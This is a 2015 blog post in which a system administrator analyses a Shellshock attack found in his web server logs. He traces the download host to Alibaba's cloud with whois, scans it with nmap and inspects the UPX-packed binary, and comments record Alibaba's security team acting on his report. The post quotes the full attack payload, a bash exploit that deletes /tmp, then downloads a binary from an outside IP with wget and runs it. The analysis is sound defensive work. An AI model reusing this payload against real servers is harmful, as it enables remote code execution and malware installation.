Has Alibaba been compromised?

I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba.

This doesn’t mean anything in and of itself, until we look at the payload.

()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22

This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from.

Run a whois against that … I’ll wait.

In the records we see a number of things:

inetnum	115.28.0.0 - 115.29.255.255
netname	ALISOFT
descr	Aliyun Computing Co., LTD
descr	5F, Builing D, the West Lake International Plaza of S&T
descr	No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country	CN

...

 
phone	+86-[redacted]
e-mail	[redacted]@alibaba-inc.com
nic-hdl	ZM1015-AP
mnt-by	MAINT-CNNIC-AP
changed	ipas@cnnic.net 20130730
source	APNIC

...

Where I hand redacted the name/email/phone from the information. Easy enough to find, but note the email address.

Who is Alisoft?

Well, according to Crunchbase

Alisoft develops, markets and delivers Internet-based business management software targeting Small and Medium Enterprises (SMEs) in China. Founded by parent Alibaba Group, Alisoft is currently offering five different services: Customer relationship management (CRM), Inventory management, Sales force management, Financial tools,and Marketing information

This could be simply one compromised machine. Never attribute to malice that which may be better explained by incompetence. They wouldn’t leave a machine wide open, right?

landman@lightning:~$ nmap 115.28.231.237

Starting Nmap 6.40 ( http://nmap.org ) at 2015-03-11 19:30 EDT
Nmap scan report for 115.28.231.237
Host is up (0.26s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
42/tcp   filtered nameserver
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
999/tcp  open     garcon
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
1434/tcp filtered ms-sql-m
3389/tcp open     ms-wbt-server
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6669/tcp filtered irc

oh … well … maybe …

Ok, but this wouldn’t be conspicuously serving and easily accessible on that port 999, right? So lets fire up links and see what we see …



Oh … my.

Ok, for laughs, let me pull down the payload. And look at it with strings. See if I see anything in there.

strings /tmp/evil

...

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $
PROT_EXEC|PROT_WRITE failed.

Ok, its UPX compressed. Lets look into it some more.

landman@lightning:/tmp$ upx-3.91-amd64_linux/upx -l evil 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   1513570 ->    416596   27.52%  netbsd/elf386  evil

and sure enough

landman@lightning:/tmp$ ls -al evil 
-rw-r--r-- 1 landman landman 1513570 Mar 11 19:36 evil

landman@lightning:/tmp$ file evil
evil: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

Again, run strings and … whoa! Someone used a -g when compiling, there are a metric butt-load of symbols in there. Seriously … Its obviously c++ source as it turns out, and its been internationalized.

And there are misspellings …

19CThreadAttackKernal

It seems to want to play with TLS. I am guessing not in a good way.

But this said, I was looking for another address, either IP address or web address, or something.

Sure enough, strings found this

www.baidu.com

...

8.8.8.8

In the end I did this

landman@lightning:/tmp$ rm -f evil

Were it really so simple.

Next up, I may send them an email point out the … er… badly misconfigured unit, and the attack server set up on it. And the attack coming from their site at a different address.

This reminds me of the Moscow rules. Once is an accident, twice is coincidence. Three times is enemy action.

Viewed 67415 times by 7590 viewers

4 thoughts on “Has Alibaba been compromised?

  1. Hi Joe, Alibaba security team has notified the Aliyun cloud user who possesses the IP address. If the user(s) has(have) further malicious behavior, we will take measures to mitigate the threat, including shutting down his/her service. Have a nice day! — Alibaba Security Team

  2. I was not expecting this (I did send the email to the security folks, and had anticipated it going into a black hole).

    Kudos to the Alibaba folks … I am hoping this portends good things going forward.

    And to summarize, Alibaba wasn’t compromised, but a user seems to have run multiple services attacking other sites, including our day job.

    Generally I tend to ignore most attacks (many are very simple attempts to exploit php holes, or run code from any number of frameworks), though some of the newer and more sophisticated multi-stage attacks get my interest. This one intrigued me. FWIW, I have now seen a similar attack from many other hosts. The Aliyun was simply the first such, and they’ve increased markedly.

    Many of these attacks are about exploiting weaknesses to gain a measure of control. Many are pathetically simpleminded. Some are sophisticated. Repelling the simpleminded attacks is generally easy. Its the ones with some thought behind them that concern me. More specifically, if there gets to be a way in general to weaponize these attacks in a mass deployment manner (hard coding IP addresses in them isn’t it), then they get more scary.

    Way back when I ran my own mail service for the company, we were fairly regularly attacked. Even more so, we played with the attack to judge its sophistication. These days, I have neither the time nor inclination to look into this, apart from exceptional cases.

    Since web servers and services provide such a large attack surface, I do what I can to minimize this surface through careful technological practices and choices. I try to avoid leaking information about what we are doing in the choices (operational security). I do what I can to reduce the real attackable surface area, and harden the surface that must be exposed. I won’t say how I do this, but its amusing to see the assumptions people whom attack us make, in their modality of attack. Its when that modality shifts from the simple minded to the sophisticated that I get more concerned.

    Bugs are security holes. They can be exploited. They are exploited. Unprotected surface is a bug/hole. Technological choices can mitigate/amplify these holes.

    Just keep in mind that you are outnumbered about 4 billion to 1, and some of those people are going to think up things you aren’t. So you need to consider that you aren’t going to catch everything, and you need to limit the impact of what succeeds. Don’t assume they will never succeed. Assume the other way, and work on defense in depth and in intelligence.

Comments are closed.